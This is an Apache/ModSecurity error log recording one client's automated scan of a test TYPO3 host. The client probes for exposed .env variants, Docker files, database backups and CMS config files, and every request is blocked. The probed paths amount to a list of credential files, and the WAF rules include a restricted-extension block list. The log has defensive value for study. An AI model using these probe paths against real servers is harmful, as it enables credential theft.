[Thu Jan 08 21:15:44.519354 2026] [:error] [pid 1270036] [client 18.119.100.98:45334] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWAQcOM1154Q6b0hewijYAAAAAE"]
[Thu Jan 08 21:15:44.519579 2026] [:error] [pid 1270036] [client 18.119.100.98:45334] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWAQcOM1154Q6b0hewijYAAAAAE"]
[Thu Jan 08 21:15:44.519737 2026] [:error] [pid 1270036] [client 18.119.100.98:45334] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWAQcOM1154Q6b0hewijYAAAAAE"]
[Thu Jan 08 21:15:44.863524 2026] [authz_core:error] [pid 1270037] [client 18.119.100.98:45444] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/db_backup.sql
[Thu Jan 08 21:15:45.935774 2026] [:error] [pid 1270041] [client 18.119.100.98:45714] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWAQcc3GwEx_BV8-CrWUIgAAAAU"]
[Thu Jan 08 21:15:45.936008 2026] [:error] [pid 1270041] [client 18.119.100.98:45714] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWAQcc3GwEx_BV8-CrWUIgAAAAU"]
[Thu Jan 08 21:15:45.936177 2026] [:error] [pid 1270041] [client 18.119.100.98:45714] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Dockerfile"] [unique_id "aWAQcc3GwEx_BV8-CrWUIgAAAAU"]
[Thu Jan 08 21:15:46.278751 2026] [:error] [pid 1270039] [client 18.119.100.98:45796] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWAQcpccQYhM1DUhi_W65gAAAAQ"]
[Thu Jan 08 21:15:46.278906 2026] [:error] [pid 1270039] [client 18.119.100.98:45796] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWAQcpccQYhM1DUhi_W65gAAAAQ"]
[Thu Jan 08 21:15:46.279122 2026] [:error] [pid 1270039] [client 18.119.100.98:45796] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWAQcpccQYhM1DUhi_W65gAAAAQ"]
[Thu Jan 08 21:15:46.279268 2026] [:error] [pid 1270039] [client 18.119.100.98:45796] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWAQcpccQYhM1DUhi_W65gAAAAQ"]
[Thu Jan 08 21:15:46.630467 2026] [:error] [pid 1270042] [client 18.119.100.98:45880] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWAQci7RlX2cRjHcFz6xngAAAAY"]
[Thu Jan 08 21:15:46.630680 2026] [:error] [pid 1270042] [client 18.119.100.98:45880] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWAQci7RlX2cRjHcFz6xngAAAAY"]
[Thu Jan 08 21:15:46.630828 2026] [:error] [pid 1270042] [client 18.119.100.98:45880] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWAQci7RlX2cRjHcFz6xngAAAAY"]
[Thu Jan 08 21:15:47.709170 2026] [:error] [pid 1270043] [client 18.119.100.98:46112] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWAQcwvEr1EpOYnVfM6riAAAAAc"]
[Thu Jan 08 21:15:47.709386 2026] [:error] [pid 1270043] [client 18.119.100.98:46112] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWAQcwvEr1EpOYnVfM6riAAAAAc"]
[Thu Jan 08 21:15:47.709534 2026] [:error] [pid 1270043] [client 18.119.100.98:46112] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWAQcwvEr1EpOYnVfM6riAAAAAc"]
[Thu Jan 08 21:15:48.797517 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:46358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Thu Jan 08 21:15:49.511841 2026] [:error] [pid 1270041] [client 18.119.100.98:46560] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWAQdc3GwEx_BV8-CrWUIwAAAAU"]
[Thu Jan 08 21:15:49.512051 2026] [:error] [pid 1270041] [client 18.119.100.98:46560] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWAQdc3GwEx_BV8-CrWUIwAAAAU"]
[Thu Jan 08 21:15:49.512220 2026] [:error] [pid 1270041] [client 18.119.100.98:46560] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWAQdc3GwEx_BV8-CrWUIwAAAAU"]
[Thu Jan 08 21:15:49.864948 2026] [:error] [pid 1270042] [client 18.119.100.98:46652] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWAQdS7RlX2cRjHcFz6xnwAAAAY"]
[Thu Jan 08 21:15:49.865205 2026] [:error] [pid 1270042] [client 18.119.100.98:46652] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWAQdS7RlX2cRjHcFz6xnwAAAAY"]
[Thu Jan 08 21:15:49.865428 2026] [:error] [pid 1270042] [client 18.119.100.98:46652] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWAQdS7RlX2cRjHcFz6xnwAAAAY"]
[Thu Jan 08 21:15:50.212870 2026] [:error] [pid 1283304] [client 18.119.100.98:46762] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWAQdmAwUIZgFNkik8yVGgAAAAg"]
[Thu Jan 08 21:15:50.213076 2026] [:error] [pid 1283304] [client 18.119.100.98:46762] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWAQdmAwUIZgFNkik8yVGgAAAAg"]
[Thu Jan 08 21:15:50.213236 2026] [:error] [pid 1283304] [client 18.119.100.98:46762] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWAQdmAwUIZgFNkik8yVGgAAAAg"]
[Thu Jan 08 21:15:50.559498 2026] [:error] [pid 1280390] [client 18.119.100.98:46886] [client 18.119.100.98] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWAQdtKTJIy7S9W5nL2LHgAAAAk"]
[Thu Jan 08 21:15:50.559666 2026] [:error] [pid 1280390] [client 18.119.100.98:46886] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWAQdtKTJIy7S9W5nL2LHgAAAAk"]
[Thu Jan 08 21:15:50.559865 2026] [:error] [pid 1280390] [client 18.119.100.98:46886] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWAQdtKTJIy7S9W5nL2LHgAAAAk"]
[Thu Jan 08 21:15:50.560024 2026] [:error] [pid 1280390] [client 18.119.100.98:46886] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWAQdtKTJIy7S9W5nL2LHgAAAAk"]
[Thu Jan 08 21:15:50.903414 2026] [:error] [pid 1270043] [client 18.119.100.98:46992] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWAQdgvEr1EpOYnVfM6riQAAAAc"]
[Thu Jan 08 21:15:50.903641 2026] [:error] [pid 1270043] [client 18.119.100.98:46992] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWAQdgvEr1EpOYnVfM6riQAAAAc"]
[Thu Jan 08 21:15:50.903805 2026] [:error] [pid 1270043] [client 18.119.100.98:46992] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWAQdgvEr1EpOYnVfM6riQAAAAc"]
[Thu Jan 08 21:15:51.974592 2026] [authz_core:error] [pid 1270035] [client 18.119.100.98:47368] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_error.log
[Thu Jan 08 21:15:52.324939 2026] [:error] [pid 1270038] [client 18.119.100.98:47496] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aWAQeBmwMJtANIcuNUXpAwAAAAM"]
[Thu Jan 08 21:15:52.325251 2026] [:error] [pid 1270038] [client 18.119.100.98:47496] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aWAQeBmwMJtANIcuNUXpAwAAAAM"]
[Thu Jan 08 21:15:52.325434 2026] [:error] [pid 1270038] [client 18.119.100.98:47496] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aWAQeBmwMJtANIcuNUXpAwAAAAM"]
[Thu Jan 08 21:15:53.052431 2026] [:error] [pid 1270041] [client 18.119.100.98:47740] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWAQec3GwEx_BV8-CrWUJAAAAAU"]
[Thu Jan 08 21:15:53.052682 2026] [:error] [pid 1270041] [client 18.119.100.98:47740] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWAQec3GwEx_BV8-CrWUJAAAAAU"]
[Thu Jan 08 21:15:53.052845 2026] [:error] [pid 1270041] [client 18.119.100.98:47740] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWAQec3GwEx_BV8-CrWUJAAAAAU"]
